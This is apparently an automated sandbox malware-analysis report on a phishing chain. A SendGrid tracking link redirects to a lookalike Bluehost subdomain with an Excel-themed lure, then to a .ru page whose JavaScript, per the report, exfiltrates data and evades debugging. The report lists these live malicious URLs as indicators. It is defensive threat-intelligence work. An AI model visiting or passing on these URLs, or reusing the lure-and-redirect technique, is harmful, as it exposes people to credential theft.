Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://u1427642.ct.sendgrid.net/ss/c/u001.FNsPiHUBxMFL4Ws_sT4ClbcHyliF9aYYaCWsJtTBDNtLQl9ZlDrQgriglBxgGE9RruWvR9yDlYrq9sYDXn9m2QBHZNBT8lOXoCfvqrsEWDs/4cw/m3JxW_wISSqopMaBzhDAkg/h0/h001.ecTtgKjf7ojZqznHApcdI1yRZPedj7DDFJ38_Fw-Xx8

Overview

General Information

Sample URL:https://u1427642.ct.sendgrid.net/ss/c/u001.FNsPiHUBxMFL4Ws_sT4ClbcHyliF9aYYaCWsJtTBDNtLQl9ZlDrQgriglBxgGE9RruWvR9yDlYrq9sYDXn9m2QBHZNBT8lOXoCfvqrsEWDs/4cw/m3JxW_wISSqopMaBzhDAkg/h0/h001.ecTtgKjf7ojZqz
Analysis ID:1584867
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
AI detected suspicious URL
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL

Classification

  • System is w10x64
  • chrome.exe (PID: 1700 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3132 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 --field-trial-handle=2208,i,4042262563919958383,11686839205852121659,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6524 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://u1427642.ct.sendgrid.net/ss/c/u001.FNsPiHUBxMFL4Ws_sT4ClbcHyliF9aYYaCWsJtTBDNtLQl9ZlDrQgriglBxgGE9RruWvR9yDlYrq9sYDXn9m2QBHZNBT8lOXoCfvqrsEWDs/4cw/m3JxW_wISSqopMaBzhDAkg/h0/h001.ecTtgKjf7ojZqznHApcdI1yRZPedj7DDFJ38_Fw-Xx8" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://u1427642.ct.sendgrid.net/ss/c/u001.FNsPiHUBxMFL4Ws_sT4ClbcHyliF9aYYaCWsJtTBDNtLQl9ZlDrQgriglBxgGE9RruWvR9yDlYrq9sYDXn9m2QBHZNBT8lOXoCfvqrsEWDs/4cw/m3JxW_wISSqopMaBzhDAkg/h0/h001.ecTtgKjf7ojZqznHApcdI1yRZPedj7DDFJ38_Fw-Xx8SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Phishing

barindex
Source: https://xre.wzr.mybluehostin.me/wp/00x376n43jd83449dhn938380-2jsnJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft Excel' is well-known and is associated with the domain 'microsoft.com'., The URL 'xre.wzr.mybluehostin.me' does not match the legitimate domain for Microsoft., The domain 'mybluehostin.me' is not associated with Microsoft and appears to be a subdomain of a hosting service, which is often used in phishing attempts., The presence of multiple subdomains and the use of a hosting service domain is suspicious and indicative of phishing., The email domain 'nooa.org' does not match the brand or the URL, adding to the suspicion. DOM: 1.0.pages.csv
Source: https://xre.wzr.mybluehostin.me/wp/00x376n43jd83449dhn938380-2jsnJoe Sandbox AI: Page contains button: 'Open in Excel' Source: '1.0.pages.csv'
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://gimd.lamantatio.ru/ZSei/#Xcydmg2@nooa.org... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While the script may have some legitimate functionality, the overall risk level is high due to the presence of these malicious indicators.
Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://gimd.lamantatio.ru/ZSei/#Xcydmg2@nooa.org... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an unknown domain, and it also redirects the user to a Microsoft login page, which is likely a phishing attempt. Overall, the script demonstrates malicious intent and poses a significant security risk.
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://gimd.lamantatio.ru/ZSei/#Xcydmg2@nooa.org... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain. The combination of these behaviors strongly suggests malicious intent, likely for the purpose of evading detection and potentially carrying out a phishing or other malicious attack.
Source: URLJoe Sandbox AI: AI detected Brand spoofing attempt in URL: https://mybluehostin.me
Source: URLJoe Sandbox AI: AI detected Typosquatting in URL: https://mybluehostin.me
Source: https://xre.wzr.mybluehostin.me/wp/00x376n43jd83449dhn938380-2jsnHTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638717756469571698.ZWUyOGFiMGYtYmVlZC00MzE1LTgxNGMtMTAxM2UzYjJmNjdkNjY5NzIwMjctYTAyZS00YTc4LWE1NjItNmYxODJhYmY3Y2Vm&ui_locales=en-US&mkt=en-US&client-request-id=d7d7f274-a0f2-41a6-8dcd-189621eb5535&state=LCAZUglXRoehzi-DSteSOdSlReaQ93c6qt7WliBIhdQJwTqgG3ggb-L48paDBCU_7oGWlIpl3q1KR7jkwtij4NqAnPLhNWG0sp4XRA5dECloZWqbzYdofyq_ZROyDLceFg6rNl7F08tU37bkDqk8DMDKylG074J3pblITWwLX1eLLn-hB4Vyb36-ON23ATQ-sx2ds39WR7TFpG6zzEnZHNbCfREfNf8wFKO0BH4Bjd_03xoc9mzrHr5PFBz1GdgB-iXpqX2uRp05n9JN35Prvg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638717756469571698.ZWUyOGFiMGYtYmVlZC00MzE1LTgxNGMtMTAxM2UzYjJmNjdkNjY5NzIwMjctYTAyZS00YTc4LWE1NjItNmYxODJhYmY3Y2Vm&ui_locales=en-US&mkt=en-US&client-request-id=d7d7f274-a0f2-41a6-8dcd-189621eb5535&state=LCAZUglXRoehzi-DSteSOdSlReaQ93c6qt7WliBIhdQJwTqgG3ggb-L48paDBCU_7oGWlIpl3q1KR7jkwtij4NqAnPLhNWG0sp4XRA5dECloZWqbzYdofyq_ZROyDLceFg6rNl7F08tU37bkDqk8DMDKylG074J3pblITWwLX1eLLn-hB4Vyb36-ON23ATQ-sx2ds39WR7TFpG6zzEnZHNbCfREfNf8wFKO0BH4Bjd_03xoc9mzrHr5PFBz1GdgB-iXpqX2uRp05n9JN35Prvg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638717756469571698.ZWUyOGFiMGYtYmVlZC00MzE1LTgxNGMtMTAxM2UzYjJmNjdkNjY5NzIwMjctYTAyZS00YTc4LWE1NjItNmYxODJhYmY3Y2Vm&ui_locales=en-US&mkt=en-US&client-request-id=d7d7f274-a0f2-41a6-8dcd-189621eb5535&state=LCAZUglXRoehzi-DSteSOdSlReaQ93c6qt7WliBIhdQJwTqgG3ggb-L48paDBCU_7oGWlIpl3q1KR7jkwtij4NqAnPLhNWG0sp4XRA5dECloZWqbzYdofyq_ZROyDLceFg6rNl7F08tU37bkDqk8DMDKylG074J3pblITWwLX1eLLn-hB4Vyb36-ON23ATQ-sx2ds39WR7TFpG6zzEnZHNbCfREfNf8wFKO0BH4Bjd_03xoc9mzrHr5PFBz1GdgB-iXpqX2uRp05n9JN35Prvg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: ee28ab0f-beed-4315-814c-1013e3b2f67d66972027-a02e-4a78-a562-6f182abf7cef
Source: https://xre.wzr.mybluehostin.me/wp/00x376n43jd83449dhn938380-2jsnHTTP Parser: Title: Protected Form does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638717756469571698.ZWUyOGFiMGYtYmVlZC00MzE1LTgxNGMtMTAxM2UzYjJmNjdkNjY5NzIwMjctYTAyZS00YTc4LWE1NjItNmYxODJhYmY3Y2Vm&ui_locales=en-US&mkt=en-US&client-request-id=d7d7f274-a0f2-41a6-8dcd-189621eb5535&state=LCAZUglXRoehzi-DSteSOdSlReaQ93c6qt7WliBIhdQJwTqgG3ggb-L48paDBCU_7oGWlIpl3q1KR7jkwtij4NqAnPLhNWG0sp4XRA5dECloZWqbzYdofyq_ZROyDLceFg6rNl7F08tU37bkDqk8DMDKylG074J3pblITWwLX1eLLn-hB4Vyb36-ON23ATQ-sx2ds39WR7TFpG6zzEnZHNbCfREfNf8wFKO0BH4Bjd_03xoc9mzrHr5PFBz1GdgB-iXpqX2uRp05n9JN35Prvg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638717756469571698.ZWUyOGFiMGYtYmVlZC00MzE1LTgxNGMtMTAxM2UzYjJmNjdkNjY5NzIwMjctYTAyZS00YTc4LWE1NjItNmYxODJhYmY3Y2Vm&ui_locales=en-US&mkt=en-US&client-request-id=d7d7f274-a0f2-41a6-8dcd-189621eb5535&state=LCAZUglXRoehzi-DSteSOdSlReaQ93c6qt7WliBIhdQJwTqgG3ggb-L48paDBCU_7oGWlIpl3q1KR7jkwtij4NqAnPLhNWG0sp4XRA5dECloZWqbzYdofyq_ZROyDLceFg6rNl7F08tU37bkDqk8DMDKylG074J3pblITWwLX1eLLn-hB4Vyb36-ON23ATQ-sx2ds39WR7TFpG6zzEnZHNbCfREfNf8wFKO0BH4Bjd_03xoc9mzrHr5PFBz1GdgB-iXpqX2uRp05n9JN35Prvg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638717756469571698.ZWUyOGFiMGYtYmVlZC00MzE1LTgxNGMtMTAxM2UzYjJmNjdkNjY5NzIwMjctYTAyZS00YTc4LWE1NjItNmYxODJhYmY3Y2Vm&ui_locales=en-US&mkt=en-US&client-request-id=d7d7f274-a0f2-41a6-8dcd-189621eb5535&state=LCAZUglXRoehzi-DSteSOdSlReaQ93c6qt7WliBIhdQJwTqgG3ggb-L48paDBCU_7oGWlIpl3q1KR7jkwtij4NqAnPLhNWG0sp4XRA5dECloZWqbzYdofyq_ZROyDLceFg6rNl7F08tU37bkDqk8DMDKylG074J3pblITWwLX1eLLn-hB4Vyb36-ON23ATQ-sx2ds39WR7TFpG6zzEnZHNbCfREfNf8wFKO0BH4Bjd_03xoc9mzrHr5PFBz1GdgB-iXpqX2uRp05n9JN35Prvg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://xre.wzr.mybluehostin.me/wp/00x376n43jd83449dhn938380-2jsnHTTP Parser: No favicon
Source: https://gimd.lamantatio.ru/ZSei/#Xcydmg2@nooa.orgHTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638717756469571698.ZWUyOGFiMGYtYmVlZC00MzE1LTgxNGMtMTAxM2UzYjJmNjdkNjY5NzIwMjctYTAyZS00YTc4LWE1NjItNmYxODJhYmY3Y2Vm&ui_locales=en-US&mkt=en-US&client-request-id=d7d7f274-a0f2-41a6-8dcd-189621eb5535&state=LCAZUglXRoehzi-DSteSOdSlReaQ93c6qt7WliBIhdQJwTqgG3ggb-L48paDBCU_7oGWlIpl3q1KR7jkwtij4NqAnPLhNWG0sp4XRA5dECloZWqbzYdofyq_ZROyDLceFg6rNl7F08tU37bkDqk8DMDKylG074J3pblITWwLX1eLLn-hB4Vyb36-ON23ATQ-sx2ds39WR7TFpG6zzEnZHNbCfREfNf8wFKO0BH4Bjd_03xoc9mzrHr5PFBz1GdgB-iXpqX2uRp05n9JN35Prvg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://xre.wzr.mybluehostin.me/wp/00x376n43jd83449dhn938380-2jsnHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638717756469571698.ZWUyOGFiMGYtYmVlZC00MzE1LTgxNGMtMTAxM2UzYjJmNjdkNjY5NzIwMjctYTAyZS00YTc4LWE1NjItNmYxODJhYmY3Y2Vm&ui_locales=en-US&mkt=en-US&client-request-id=d7d7f274-a0f2-41a6-8dcd-189621eb5535&state=LCAZUglXRoehzi-DSteSOdSlReaQ93c6qt7WliBIhdQJwTqgG3ggb-L48paDBCU_7oGWlIpl3q1KR7jkwtij4NqAnPLhNWG0sp4XRA5dECloZWqbzYdofyq_ZROyDLceFg6rNl7F08tU37bkDqk8DMDKylG074J3pblITWwLX1eLLn-hB4Vyb36-ON23ATQ-sx2ds39WR7TFpG6zzEnZHNbCfREfNf8wFKO0BH4Bjd_03xoc9mzrHr5PFBz1GdgB-iXpqX2uRp05n9JN35Prvg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638717756469571698.ZWUyOGFiMGYtYmVlZC00MzE1LTgxNGMtMTAxM2UzYjJmNjdkNjY5NzIwMjctYTAyZS00YTc4LWE1NjItNmYxODJhYmY3Y2Vm&ui_locales=en-US&mkt=en-US&client-request-id=d7d7f274-a0f2-41a6-8dcd-189621eb5535&state=LCAZUglXRoehzi-DSteSOdSlReaQ93c6qt7WliBIhdQJwTqgG3ggb-L48paDBCU_7oGWlIpl3q1KR7jkwtij4NqAnPLhNWG0sp4XRA5dECloZWqbzYdofyq_ZROyDLceFg6rNl7F08tU37bkDqk8DMDKylG074J3pblITWwLX1eLLn-hB4Vyb36-ON23ATQ-sx2ds39WR7TFpG6zzEnZHNbCfREfNf8wFKO0BH4Bjd_03xoc9mzrHr5PFBz1GdgB-iXpqX2uRp05n9JN35Prvg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638717756469571698.ZWUyOGFiMGYtYmVlZC00MzE1LTgxNGMtMTAxM2UzYjJmNjdkNjY5NzIwMjctYTAyZS00YTc4LWE1NjItNmYxODJhYmY3Y2Vm&ui_locales=en-US&mkt=en-US&client-request-id=d7d7f274-a0f2-41a6-8dcd-189621eb5535&state=LCAZUglXRoehzi-DSteSOdSlReaQ93c6qt7WliBIhdQJwTqgG3ggb-L48paDBCU_7oGWlIpl3q1KR7jkwtij4NqAnPLhNWG0sp4XRA5dECloZWqbzYdofyq_ZROyDLceFg6rNl7F08tU37bkDqk8DMDKylG074J3pblITWwLX1eLLn-hB4Vyb36-ON23ATQ-sx2ds39WR7TFpG6zzEnZHNbCfREfNf8wFKO0BH4Bjd_03xoc9mzrHr5PFBz1GdgB-iXpqX2uRp05n9JN35Prvg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://xre.wzr.mybluehostin.me/wp/00x376n43jd83449dhn938380-2jsnHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638717756469571698.ZWUyOGFiMGYtYmVlZC00MzE1LTgxNGMtMTAxM2UzYjJmNjdkNjY5NzIwMjctYTAyZS00YTc4LWE1NjItNmYxODJhYmY3Y2Vm&ui_locales=en-US&mkt=en-US&client-request-id=d7d7f274-a0f2-41a6-8dcd-189621eb5535&state=LCAZUglXRoehzi-DSteSOdSlReaQ93c6qt7WliBIhdQJwTqgG3ggb-L48paDBCU_7oGWlIpl3q1KR7jkwtij4NqAnPLhNWG0sp4XRA5dECloZWqbzYdofyq_ZROyDLceFg6rNl7F08tU37bkDqk8DMDKylG074J3pblITWwLX1eLLn-hB4Vyb36-ON23ATQ-sx2ds39WR7TFpG6zzEnZHNbCfREfNf8wFKO0BH4Bjd_03xoc9mzrHr5PFBz1GdgB-iXpqX2uRp05n9JN35Prvg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638717756469571698.ZWUyOGFiMGYtYmVlZC00MzE1LTgxNGMtMTAxM2UzYjJmNjdkNjY5NzIwMjctYTAyZS00YTc4LWE1NjItNmYxODJhYmY3Y2Vm&ui_locales=en-US&mkt=en-US&client-request-id=d7d7f274-a0f2-41a6-8dcd-189621eb5535&state=LCAZUglXRoehzi-DSteSOdSlReaQ93c6qt7WliBIhdQJwTqgG3ggb-L48paDBCU_7oGWlIpl3q1KR7jkwtij4NqAnPLhNWG0sp4XRA5dECloZWqbzYdofyq_ZROyDLceFg6rNl7F08tU37bkDqk8DMDKylG074J3pblITWwLX1eLLn-hB4Vyb36-ON23ATQ-sx2ds39WR7TFpG6zzEnZHNbCfREfNf8wFKO0BH4Bjd_03xoc9mzrHr5PFBz1GdgB-iXpqX2uRp05n9JN35Prvg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638717756469571698.ZWUyOGFiMGYtYmVlZC00MzE1LTgxNGMtMTAxM2UzYjJmNjdkNjY5NzIwMjctYTAyZS00YTc4LWE1NjItNmYxODJhYmY3Y2Vm&ui_locales=en-US&mkt=en-US&client-request-id=d7d7f274-a0f2-41a6-8dcd-189621eb5535&state=LCAZUglXRoehzi-DSteSOdSlReaQ93c6qt7WliBIhdQJwTqgG3ggb-L48paDBCU_7oGWlIpl3q1KR7jkwtij4NqAnPLhNWG0sp4XRA5dECloZWqbzYdofyq_ZROyDLceFg6rNl7F08tU37bkDqk8DMDKylG074J3pblITWwLX1eLLn-hB4Vyb36-ON23ATQ-sx2ds39WR7TFpG6zzEnZHNbCfREfNf8wFKO0BH4Bjd_03xoc9mzrHr5PFBz1GdgB-iXpqX2uRp05n9JN35Prvg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: u1427642.ct.sendgrid.net to https://xre.wzr.mybluehostin.me/wp/00x376n43jd83449dhn938380-2jsn
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /ss/c/u001.FNsPiHUBxMFL4Ws_sT4ClbcHyliF9aYYaCWsJtTBDNtLQl9ZlDrQgriglBxgGE9RruWvR9yDlYrq9sYDXn9m2QBHZNBT8lOXoCfvqrsEWDs/4cw/m3JxW_wISSqopMaBzhDAkg/h0/h001.ecTtgKjf7ojZqznHApcdI1yRZPedj7DDFJ38_Fw-Xx8 HTTP/1.1Host: u1427642.ct.sendgrid.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp/00x376n43jd83449dhn938380-2jsn HTTP/1.1Host: xre.wzr.mybluehostin.meConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: xre.wzr.mybluehostin.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://xre.wzr.mybluehostin.me/wp/00x376n43jd83449dhn938380-2jsnAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ZSei/ HTTP/1.1Host: gimd.lamantatio.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://xre.wzr.mybluehostin.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gimd.lamantatio.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
